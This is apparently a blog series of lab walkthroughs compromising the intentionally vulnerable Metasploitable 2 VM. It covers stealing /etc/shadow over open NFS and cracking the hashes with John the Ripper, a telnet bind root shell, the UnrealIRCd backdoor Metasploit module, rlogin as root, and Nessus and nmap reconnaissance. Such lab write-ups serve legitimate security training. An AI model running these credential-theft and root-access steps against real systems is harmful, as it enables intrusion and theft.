Metasploitable 2 – Password Hash Cracking with John the Ripper

This post assumes you have access to the target filesystem in question and want to extract and then crack the password hashes from the local machine.

In this example I am going to crack the account passwords used in Metasploitable 2, but the techniques here can be used in many different scenarios.

John the Ripper is included by default with Kali 2 – which is what I am using here.

To be able to crack the accounts we need two files from the target system:

  • /etc/passwd  -> Containing the user information
  • /etc/shadow -> Containing the corresponding password hashes for the users

(Again there are various ways you could grab these files – for a very simple example using Metasploitable 2 as the target see this post here: https://securityaspirations.com/2017/07/03/metasploitable-2-compromise-nfs-shares/)

[Screenshot: metasploitable_passwd]

[Screenshot: metasploitable_shadow]

Once you have the two files we can begin cracking them with John the Ripper.

However, before we give the hashes to John, we need to combine the two files into one so that each user is paired with their password hash. We can do this with a utility called ‘unshadow’ (also included in Kali 2 by default).

The command required is:

unshadow Path_to_passwd Path_to_shadow > output.txt

[Screenshot: Metasploitable_Unshadow]

Now we have the combined file (I named mine merged.txt):

[Screenshot: Metasploitable_merged]
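The merge that unshadow performs is simple enough to show in a few lines of Python, so here it is as an added example (not code from the post or from John the Ripper). The passwd and shadow lines are constructed to resemble Metasploitable 2's and the hash bodies are placeholders; the example also names the crypt(3) scheme for each account, which tells a defender how cheap those hashes are to crack.

```python
# Added example (not from the original post): the merge that unshadow performs,
# plus a quick audit of which accounts actually carry a crackable hash and what
# scheme protects them. The passwd/shadow lines below are constructed to look
# like Metasploitable 2's; the hash bodies are placeholders, not real hashes.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
sys:x:3:3:sys:/dev:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$1$PLACEHOLDERSALT$PLACEHOLDERHASHROOT:14747:0:99999:7:::
sys:$1$PLACEHOLDERSALT$PLACEHOLDERHASHSYS:14742:0:99999:7:::
nobody:*:14684:0:99999:7:::
msfadmin:$1$PLACEHOLDERSALT$PLACEHOLDERHASHMSF:14684:0:99999:7:::
"""

def unshadow(passwd_text, shadow_text):
    """Put each shadow hash into the matching passwd entry's password field,
    producing the merged lines John reads (what the unshadow utility does)."""
    hashes = dict(line.split(":")[:2] for line in shadow_text.splitlines() if line.strip())
    merged = []
    for line in passwd_text.splitlines():
        if line.strip():
            fields = line.split(":")
            fields[1] = hashes.get(fields[0], fields[1])  # keep 'x' if no shadow entry
            merged.append(":".join(fields))
    return merged

def hash_type(field):
    """Name the crypt(3) scheme from the hash prefix, or 'locked' for *, !, empty or x."""
    for prefix, name in (("$1$", "md5crypt"), ("$5$", "sha256crypt"),
                         ("$6$", "sha512crypt"), ("$y$", "yescrypt")):
        if field.startswith(prefix):
            return name
    return "locked" if field in ("", "x") or field.startswith(("*", "!")) else "unknown"

def crackable_accounts(merged_lines):
    """(user, scheme) for each entry John would actually try. md5crypt is the
    fast-to-crack scheme; a modern system should show sha512crypt or yescrypt."""
    rows = [(line.split(":")[0], hash_type(line.split(":")[1])) for line in merged_lines]
    return [(user, scheme) for user, scheme in rows if scheme not in ("locked", "unknown")]
```

Locked accounts such as nobody are skipped because their password field holds no hash, which is also why they never appear in John's output.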

Now let's put John to work. We could supply a password list for John to use, but it comes with a default wordlist, so we may as well try that first.

To start the crack, point John at our newly created file:

john merged.txt

Within a couple of seconds we appear to have a hit on most of the accounts:

[Screenshot: Cracked_Hashes]

It’s not always this quick, and of course we are still missing the ‘root’ account, but you get the idea. I let the crack run for another hour before cancelling, but the root account had still not been cracked. The password may still be in John's default password list; I would just need to let the cracking process run to completion to find out. If that failed, it might be worth trying a bigger password list (such as the ‘rockyou’ list).

Either way, once the run is complete you can view each account and its corresponding password by running the following command against the original file you gave John to crack:

john --show <file.txt>

[Screenshot: Metasploitable_Cracked_passwords]

If you want to confirm they work, test them out on the Metasploitable box:

[Screenshot: Logged in as Sys]

Metasploitable 2: Compromise – NFS Shares

Our Nessus scan results show an interesting vulnerability:

Medium (5.0) 42256 NFS Shares World Readable

It’s only got a medium risk rating but who knows what data is in there.

Let's connect to it from our Kali box. There are various ways you could do this – here we can simply point the file browser at the box by specifying the system in the connect window:

nfs://192.168.168.134/

[Screenshot: Connect NFS Metasploitable]

Hit connect and we are in the root of the filesystem without any prompt for authentication:

[Screenshot: NFS_Connected]

We can take this further now by trying to grab the account password hashes from the system and then cracking them with something like John the Ripper.

Metasploitable 2 – Compromise: Root Shell

Remember our Nmap results? (https://securityaspirations.com/2017/06/25/metasploitable-2-system-recon/)

One of the entries in there was listed as follows:

1524/tcp  open  shell       Metasploitable root shell

This is probably one of the simplest Metasploitable vulns. There is a root shell open on the box; let's see if we can connect to it with telnet:

telnet 192.168.168.134 1524

  • telnet <dest_IP> <dest_Port>

[Screenshot: Metasploitable root login]

Surprisingly, we are connected to the shell without being prompted for credentials.

A quick check with ‘whoami’ and ‘hostname’ commands confirms we are root and on the metasploitable box.

Metasploitable 2 – Compromise: UnrealIRC

Let's take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And let's do a search for any hits on ‘unrealirc’:

search unrealirc

[Screenshot: Metasploit_unrealirc]

Great, we have a hit. Let's choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor

[Screenshot: use_unreal_exploit]

We now need to configure it. To see what’s required, use:

show options

[Screenshot: metasploit_unreal_show-options]

Let's set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:

[Screenshot: metasploit_unrealirc_rhost]

Now let's see if it works by typing ‘run’:

run

[Screenshot: Metasploit_unrealirc_exploit_run]

Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see, the exploit was successful; we have root access to the Metasploitable box once more.

Metasploitable 2 – Compromise: rlogin

One of the simplest compromises of the Metasploitable box.

We can see from the nmap results:

513/tcp   open  login?

Nessus also detected the use of rlogin:

High (7.5) 10205 rlogin Service Detection

At this stage we don’t have any info on possible accounts on the Metasploitable box, but it is likely that there is a ‘root’ account.

As such we can try the following command and see what we get:

rlogin -l root 192.168.168.134
  • -l: user to log in as

[Screenshot: rlogin1]

So we are prompted for a password – a good sign the root account is valid.

But there is actually more to this than the above suggests.

I am using a fresh install of Kali 2 and the rsh-client is not installed by default. So let's install it with:

apt-get install rsh-client

[Screenshot: rsh-client]

Now let's try that original rlogin command once more:

[Screenshot: rlogin - compromise]

Bingo… we’re in, and with root access no less.

Metasploitable 2 – Vuln scan with Nessus

One of the simplest ways to spot an attack vector is to perform a vulnerability scan against the box.

In this case I am going to use Nessus Home (https://www.tenable.com/products/nessus-home) as it is free to sign up and does the job well.

Once Nessus Home is up and running (and up to date) we can kick off a scan against our box:

[Screenshot: Nessus Scan]

And once complete we can take a look at the results:

[Screenshot: Nessus_Metasploitable_summary]

The full list of results with details can be found here:

Nessus Scan Report

Metasploitable 2 – System Recon

Now we know which IP to target – we can start performing some recon to gather some more details about the system.

Again, there are various ways to do this, but I like to start with nmap.

nmap -sTV -o metasploitable -p1-65535 192.168.168.134
  • -sTV = T is a TCP connect scan, V is a version scan
  • -o metasploitable = output results to a file called metasploitable
  • -p1-65535 = scan all ports in this range. Without this, nmap scans only the top 1000 commonly used ports, which could miss some more obscure ones, so this command scans them all
  • 192.168.168.134 = the IP of the Metasploitable box

[Screenshot: nmap_port_service_results]

So we now have a full list of open ports on the Metasploitable box along with the likely service and even the version in use for each service/application.

Here is the full output:

# Nmap 7.40 scan initiated Sun May 14 15:24:23 2017 as: nmap -sTV -o metasploitable -p1-65535 192.168.168.134
Nmap scan report for 192.168.168.134
Host is up (0.00038s latency).
Not shown: 65505 closed ports

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd (Admin email admin@Metasploitable.LAN)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34140/tcp open  mountd      1-3 (RPC #100005)
37940/tcp open  status      1 (RPC #100024)
42380/tcp open  unknown
57109/tcp open  nlockmgr    1-4 (RPC #100021)

MAC Address: 00:0C:29:D5:07:11 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 14 15:27:08 2017 -- 1 IP address (1 host up) scanned in 165.54 seconds

We can now use this information to start exploiting the box.
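As an added example (not part of the original post), here is a small Python parser for Nmap's normal-format output like the listing above, with a triage step that flags the open services the rest of this series goes on to walk into; the sample input is a constructed excerpt in the same format as the scan, and the RISKY table is my own selection.

```python
# Added example (not from the original post): parse Nmap's normal (-oN) output
# into rows and flag the open services that the rest of this series abuses.
# The excerpt below is constructed in the same format as the post's scan.
import re

NMAP_SAMPLE = """\
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
6667/tcp  open  irc         UnrealIRCd
"""

# port/proto, state, service name (nmap appends '?' when it is only guessing),
# then an optional free-text version column
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap_ports(text):
    """Return (port, proto, state, service, version) for each port line."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, (version or "").strip()))
    return rows

# Why a defender cares: these services either need no credentials at all or
# send them in the clear (my selection, based on what this series exploits).
RISKY = {
    "telnet": "cleartext login protocol",
    "login": "rlogin: trust-based login, no encryption",
    "shell": "rsh, or a bind shell on a non-standard port",
    "exec": "rexec: cleartext remote command execution",
    "nfs": "check that exports are not world-readable",
}

def flag_risky(rows):
    """(port, service, reason) for every open port whose service is in RISKY."""
    findings = []
    for port, proto, state, service, version in rows:
        reason = RISKY.get(service.rstrip("?"))
        if state == "open" and reason:
            findings.append((port, service, reason))
    return findings
```

Run against the full listing above it picks out the same ports (23, 512, 513, 514, 1524, 2049) that the compromise posts use, which makes it a quick checklist of what to disable or firewall first.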